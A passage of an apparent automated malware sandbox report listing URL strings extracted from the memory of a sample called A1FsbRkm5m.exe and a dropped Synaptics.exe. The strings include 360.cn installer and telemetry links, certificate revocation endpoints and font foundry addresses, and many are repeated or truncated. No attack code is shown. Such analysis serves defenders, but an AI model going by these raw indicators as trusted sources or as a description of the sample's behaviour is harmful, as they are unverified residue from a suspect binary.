                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128g
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128tmp
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128w
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540644885.0000000003FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128x
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cabrd=50241128
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cabrd=50241128U
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://pinst.360.cn/360se/wssj_setup.cab
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://pinst.360.cn/zhuomian/desktopsafe.cab
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.538901400.0000000002A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safefin
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539066623.0000000002B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539066623.0000000002B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539231658.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.540239401.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.539066623.0000000002B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540239401.0000000003A10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safefi
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539102931.0000000002B6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539066623.0000000002B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=130&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539421176.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.540239401.0000000003A10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safefin
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.539102931.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.539861153.000000000312F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=b8a4400180ee20f44982cb4d73d6fcd7&from=safefi
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0f
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wpad.%s/wpad.dathttp://%s/wpad.datwpad
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://www.360.cn
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.360.cn/
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.360.cn//index.html127.0.0.1--
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: http://www.360.cn/privacy/v3/360anquanweishi.html
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://www.360.cn/xukexieyi.html#360
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.421742810.000000000495F000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.420601741.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.420899070.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.420200895.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.421854664.000000000495F000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.420321597.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.419696405.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.543236607.0000000004960000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.423165149.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.416662666.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.427810998.000000000495D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.423053063.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.420702633.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.427508037.000000000495D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.422746375.000000000495F000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.421417047.000000000495F000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.422824288.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.421140388.0000000004962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.389473297.000000000492F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.385763115.0000000004943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.384122490.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384096257.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385546737.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385063585.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384877698.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385297286.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385510639.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385430448.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385249104.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385596847.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385699721.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385726577.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384742874.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384547955.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384617521.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384414205.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385354347.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384356333.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384286577.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385097383.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385039131.000000000493D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com-u
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.385063585.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385297286.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385249104.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385699721.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385726577.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385932422.000000000493D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385097383.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385796871.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385039131.000000000493D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385763115.0000000004943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com.
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.385546737.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385297286.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385510639.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385430448.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385249104.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385596847.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385699721.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385726577.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385354347.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385796871.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385763115.0000000004943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com.A3
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.385546737.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384877698.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385596847.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385699721.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385726577.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384742874.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384547955.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384617521.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384414205.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384356333.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384286577.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385796871.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384245477.000000000493D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384325047.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385763115.0000000004943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com/
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.385546737.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385063585.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384877698.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385297286.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385510639.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385430448.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385249104.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384742874.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384547955.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384617521.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384414205.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385354347.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384356333.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385097383.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385039131.000000000493D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384325047.0000000004943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.385063585.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384877698.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385297286.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385249104.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384742874.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384547955.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384617521.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385097383.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385039131.000000000493D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comq
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.394939384.0000000004962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.co
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.393529669.0000000004930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.393203282.000000000492F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.406923108.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.421742810.000000000495F000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.398525043.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.420601741.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.400567454.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.403413807.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.405574111.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.400223198.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.406805359.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.413188420.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.408007587.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.405904409.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.411188078.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.405495353.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.396994084.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.398004660.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.408058499.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.420899070.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.399832206.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.420200895.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.408182139.0000000004962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.394803344.0000000004962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.394939384.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.395072764.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.394803344.0000000004962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlvx
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.393358788.0000000004930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
